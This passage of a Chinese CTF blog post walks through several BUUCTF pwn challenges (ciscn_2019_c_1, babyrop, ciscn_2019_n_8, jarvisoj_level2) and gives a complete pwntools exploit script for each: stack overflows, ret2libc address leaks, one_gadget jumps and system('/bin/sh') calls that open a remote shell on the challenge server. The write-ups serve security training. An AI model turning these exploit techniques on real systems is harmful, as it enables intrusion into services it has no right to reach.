函数的真实地址，从而确定 libc 版本，进而知道其他函数的地址，因为64位传参的约定，我们还需要找 rdi 寄存器的地址</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary pwn --only &quot;ret|pop&quot; | grep &quot;rdi&quot;</span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_c_1/H_BSOXBZ0%28P%5DJ%5DA%5BO034EG5.png" alt=""><br>rdi寄存器地址为：0x0000000000400c83，编写exp泄露libc版本</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>, <span class="number">25051</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">start_addr = elf.sym[<span class="string">&#x27;_start&#x27;</span>]</span><br><span class="line">rdi_addr = <span class="number">0x0000000000400c83</span></span><br><span class="line">payload_1 = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x50</span>+<span class="number">8</span>) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(start_addr)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your choice!&quot;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your Plaintext to be encrypted&quot;</span>,payload_1)</span><br><span class="line">puts_addr = u64(p.recvuntil(<span class="string">&quot;\x7f&quot;</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">success(hex(puts_addr))</span><br></pre></td></tr></table></figure><p>运行后得到 puts 函数的地址：0x7f0ee53849c0<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_c_1/B_BZHP6D~OPCF%7B%25_2XD056X.png" alt="">取后三位，去这个网站查 libc 版本：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://libc.blukat.me/">https://libc.blukat.me/</a><br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_c_1/28QMMTK419AKSAL%5BP%7BXXW0P.png" alt="">下载下来后，用 one_gadget 搜索 execve 地址，随意选一个地址<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_c_1/FDUWD_NRI%60%5B69CR%7B68FXFPC.png" alt=""><br>接着编写exp</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>, <span class="number">25051</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">start_addr = elf.sym[<span class="string">&#x27;_start&#x27;</span>]</span><br><span class="line">rdi_addr = <span class="number">0x0000000000400c83</span></span><br><span class="line">payload_1 = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x50</span>+<span class="number">8</span>) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(start_addr)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your choice!&quot;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your Plaintext to be encrypted&quot;</span>,payload_1)</span><br><span class="line">puts_addr = u64(p.recvuntil(<span class="string">&quot;\x7f&quot;</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">success(hex(puts_addr))</span><br><span class="line">libc = puts_addr - <span class="number">0x0809c0</span></span><br><span class="line">exec_addr = libc + <span class="number">0x4f322</span></span><br><span class="line">payload_2 = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x50</span>+<span class="number">8</span>) + p64(exec_addr)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your choice!&quot;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your Plaintext to be encrypted&quot;</span>,payload_2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="babyrop"><a class="header-anchor" href="#babyrop">¶</a>babyrop</h2><h3 id="知识点：栈溢出，ret2libc3-v2"><a class="header-anchor" href="#知识点：栈溢出，ret2libc3-v2">¶</a>知识点：栈溢出，ret2libc3</h3><p>checksec 检查为32位程序，在ida中查看 main 函数<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/%5BOGeek2019%5Dbabyrop/N_%5BU~2C4S~XNGRW%7BLD5%25VBQ.png" alt="">我们先跟进第一个函数 sub_804871F 查看<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/%5BOGeek2019%5Dbabyrop/2DLSOB%29KFYCQWDE~T%29MZXSQ.png" alt="">相关逻辑已经写在注释中，注意观察这里有个 strncmp 函数比较，但在比较前有一个统计长度的<code>strlen</code>函数，该函数遇到<code>\0</code>就会结束，所以我们可以通过传入<code>\0</code>来绕过比较<br>接下来观察第二个函数 sub_80487D0<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/%5BOGeek2019%5Dbabyrop/FYIEOX22F%5BO8H3UDAAOVBEI.png" alt=""><br>a1 是前面一个函数的返回值，也就是 buf 数组的第8个字符，所以这里我们只要构造大于 231 就会发生栈溢出，然后就是经典的 ret2libc3了，这里通过泄露 write 函数地址来获得函数的真实地址</p><p>接下来就是 buf 的第8个字符串具体要构造多少呢，我们需要考虑 payload 的长度，比如我的payload只需要构造大于或者等于255就行，exp如下</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level=&quot;debug&quot;</span></span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>, <span class="number">27793</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc-2.23.so&quot;</span>)</span><br><span class="line">bypass = <span class="string">&quot;\0&quot;</span>*<span class="number">7</span> + <span class="string">&quot;\255&quot;</span></span><br><span class="line">p.sendline(bypass)</span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">main_addr = <span class="number">0x8048825</span></span><br><span class="line"><span class="comment"># main_addr是需要返回的函数地址，构造成write(1, write_got ,8)泄露got表地址，这里a是235，后面p32为4个长度字节，也就是235+4*20=255，所以第8个字符串为255或者大于255都可以</span></span><br><span class="line">payload_1 = <span class="string">&quot;a&quot;</span>*(<span class="number">231</span>+<span class="number">4</span>) +p32(write_plt) +p32(main_addr)+ p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">8</span>) </span><br><span class="line">p.sendlineafter(<span class="string">&quot;Correct\n&quot;</span>, payload_1)</span><br><span class="line">write_addr = u32(p.recvuntil(<span class="string">&quot;\xf7&quot;</span>)[<span class="number">-4</span>:].ljust(<span class="number">4</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">success(hex(write_addr))</span><br><span class="line">libc_base = write_addr - libc.sym[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">success(hex(libc_base))</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh_addr = libc_base + libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).next()</span><br><span class="line">p.sendline(bypass)</span><br><span class="line">payload_2 = <span class="string">&#x27;a&#x27;</span>*(<span class="number">231</span>+<span class="number">4</span>) + p32(system_addr) + p32(<span class="number">0</span>) + p32(bin_sh_addr)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Correct\n&quot;</span>, payload_2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="ciscn-2019-n-8"><a class="header-anchor" href="#ciscn-2019-n-8">¶</a>ciscn_2019_n_8</h2><p>checksec 下保护全开，ida 中查看源代码<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/%5BOGeek2019%5Dbabyrop/5%5DLV1Z%29VM8G%5BNZ%5BB01UQ%28%24M.png" alt=""><br>定义的 var 是int数组类型，在内存中占4个字节，即数组中每个元素占4个字节，在下边为13也就是第14个元素的值等于17就能 getshell，exp如下</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level=&quot;debug&quot;</span></span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>, <span class="number">29967</span>)</span><br><span class="line">payload = <span class="string">&#x27;aaaa&#x27;</span>*<span class="number">13</span> + p32(<span class="number">17</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="jarvisoj-level2"><a class="header-anchor" href="#jarvisoj-level2">¶</a>jarvisoj_level2</h2><h3 id="知识点：栈溢出，ret2libc1"><a class="header-anchor" href="#知识点：栈溢出，ret2libc1">¶</a>知识点：栈溢出，ret2libc1</h3><p>checksec 检查只开启了 NX 保护，打开 ida 查看源代码，跟进 vulnerable_function</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">vulnerable_function</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">136</span>]; <span class="comment">// [esp+0h] [ebp-88h] BYREF</span></span><br><span class="line"></span><br><span class="line">  system(<span class="string">&quot;echo Input:&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, buf, <span class="number">0x100</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>0x100 &gt; 136，典型的栈溢出，并且在ida中可以看到 system 函数地址为0x08048320，字符串 /bin/sh 地址为0x0804A024，直接写exp</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level=&quot;debug&quot;</span></span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>, <span class="number">29257</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*(<span class="number">136</span>+<span class="number">4</span>) + p32(<span class="number">0x08048320</span>) + p32(<span class="number">1</span>) + p32(<span class="number">0x0804A024</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="等待更新"><a class="header-anchor" href="#等待更新">¶</a>等待更新</h2></div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者:</span> <span class="post-copyright-info"><a href="mailto:undefined" rel="external nofollow noreferrer">dota_st</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接:</span> <span class="post-copyright-info"><a href="https://www.wlhhlc.top/posts/6613/">https://www.wlhhlc.top/posts/6613/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明:</span> <span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noreferrer" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.wlhhlc.top" target="_blank">dota_st</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/PWN/">PWN</a></div><div class="post_share"><div class="social-share" data-image="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/5d4c6aff824a4ee2894929d50d72c7e8.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/mm_facetoface_collect_qrcode_1601714082856.png" rel="external nofollow noreferrer" target="_blank"><img class="post-qr-code-img" src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/mm_facetoface_collect_qrcode_1601714082856.png" alt="微信"></a><div class="post-qr-code-desc">微信</div></li><li class="reward-item"><a href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/1601714101044.jpg" rel="external nofollow noreferrer" target="_blank"><img class="post-qr-code-img" src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/1601714101044.jpg" alt="支付宝"></a><div class="post-qr-code-desc">支付宝</div></li></ul></div></div></div><nav class="pagination-post" id="pagination"><div class="next-post pull-full"><a href="/posts/17489/"><img class="next-cover" src="https://blog-file-1302856486.file.myqcloud.com/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/43d2de27880811ebb6edd017c2d2eca2.jpg" onerror='onerror=null,src="/img/404.jpg"'><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">pwn新手入门之格式化字符串漏洞</div></div></a></div></nav><hr><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i> <span>评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021<i id="heartbeat" class="fa fas fa-heartbeat"></i> dota_st</div><div class="framework-info"><span>dota_st</span> <span class="footer-separator">|</span><span>博客</span></div><div class="icp"><a target="_blank" rel="noopener external nofollow noreferrer" href="http://beian.miit.gov.cn"><img class="icp-icon" src="/img/icp.png"><span>琼ICP备2020003865号</span></a></div><html></html><head><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/HCLonely/images@master/others/heartbeat.min.css"></head><body><span id="sitetime"></span><script language="javascript">function siteTime(){window.setTimeout("siteTime()",1e3);var e=36e5,t=24*e,o=new Date,i=o.getFullYear(),a=o.getMonth()+1,n=o.getDate(),r=o.getHours(),l=o.getMinutes(),s=o.getSeconds(),M=Date.UTC(2020,10,4,9,0,0),g=Date.UTC(i,a,n,r,l,s)-M,m=Math.floor(g/31536e6),T=Math.floor(g/t-365*m),f=Math.floor((g-(365*m+T)*t)/e),h=Math.floor((g-(365*m+T)*t-f*e)/6e4),u=Math.floor((g-(365*m+T)*t-f*e-6e4*h)/1e3);document.getElementById("sitetime").innerHTML="小破站已在各种灾难中苟活"+m+" 年 "+T+" 天 "+f+" 小时 "+h+" 分钟 "+u+" 秒"}siteTime()</script></body></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/wzpan/hexo-generator-search" style="color:#49b1f5">hexo-generator-search</a> <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fas fa-times"></i></span></div><div id="search-mask"></div><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="/js/search/local-search.js"></script><script>var preloader = {
  endLoading: () => {
    document.body.style.overflow = 'auto';
    document.getElementById('loading-box').classList.add("loaded")
  },
  initLoading: () => {
    document.body.style.overflow = '';
    document.getElementById('loading-box').classList.remove("loaded")

  }
}
window.addEventListener('load',()=> {preloader.endLoading()})</script><div class="js-pjax"><script>function loadValine () {
  function initValine () {
    const initData = {
      el: '#vcomment',
      appId: 'UUju4xdzD3vbcfVWDxse7HuR-gzGzoHsz',
      appKey: 'CndJYK78YWz9SQN7rDMKmM1q',
      placeholder: 'o(*≥▽≤)ツ┏━┓\n昵称直接输入QQ号\n我就能获取你的qq名字和头像嗷！',
      avatar: 'monsterid',
      meta: 'nick,mail,link'.split(','),
      pageSize: '10',
      lang: 'zh-CN',
      recordIP: true,
      serverURLs: '',
      emojiCDN: '',
      emojiMaps: "",
      enableQQ: true,
      path: window.location.pathname,
    }

    if (true) { 
      initData.requiredFields= ('nick,mail'.split(','))
    }

    const valine = new Valine(initData)
  }

  if (typeof Valine === 'function') initValine() 
  else $.getScript('https://cdn.jsdelivr.net/gh/dota-st/blog_file/Valine.min.js', initValine)
}

if ('Valine' === 'Valine' || !false) {
  if (false) btf.loadComment(document.querySelector('#vcomment'),loadValine)
  else setTimeout(() => loadValine(), 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/background.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful=!0,POWERMODE.shake=!0,POWERMODE.mobile=!1,document.body.addEventListener("input",POWERMODE)</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = [
  'title',
  '#config_change',
  '#body-wrap',
  '#rightside-config-hide',
  '#rightside-config-show',
  '.js-pjax'
]

if (false) {
  pjaxSelectors.unshift('meta[property="og:image"]', 'meta[property="og:title"]', 'meta[property="og:url"]')
}

var pjax = new Pjax({
  elements: 'a:not([target="_blank"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()
  window.foot_tm()
  
  $('script[data-pjax]').each(function () {
    $(this).parent().append($(this).remove())
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof chatBtnFn === 'function' && chatBtnFn()
  typeof panguInit === 'function' && panguInit()

  if (typeof gtag === 'function') {
    gtag('config', '', {'page_path': window.location.pathname});
  }

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // Analytics
  if (false) {
    MtaH5.pgv()
  }

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()

  typeof preloader === 'object' && preloader.endLoading()
})


document.addEventListener('pjax:send', function () {
  typeof preloader === 'object' && preloader.initLoading()
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  $(window).off('scroll')

  //reset readmode
  $('body').hasClass('read-mode') && $('body').removeClass('read-mode')

})</script></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({pluginRootPath:"live2dw/",pluginJsPath:"lib/",pluginModelPath:"assets/",tagMode:!1,debug:!1,model:{scale:1,hHeadPos:.5,vHeadPos:.618,jsonPath:"/live2dw/assets/haruto.model.json"},display:{superSample:2,position:"right",width:150,height:300,hOffset:20,vOffset:-90},mobile:{show:!0,scale:1},react:{opacityDefault:.3,opacityOnHover:.3,opacity:.95},log:!1})</script></body></html>